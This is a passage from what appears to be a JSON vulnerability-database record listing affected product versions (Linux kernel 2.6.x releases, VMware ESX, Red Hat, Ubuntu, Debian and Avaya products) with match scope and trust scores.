        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.30.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.30.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.30.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.27"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.0.3"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.0"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "esx server esx410-201101201",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel 2.6.33-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pardus",
        "version": "20090"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel 2.6.33-rc6-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "hat enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "aura conferencing standard",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.33-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
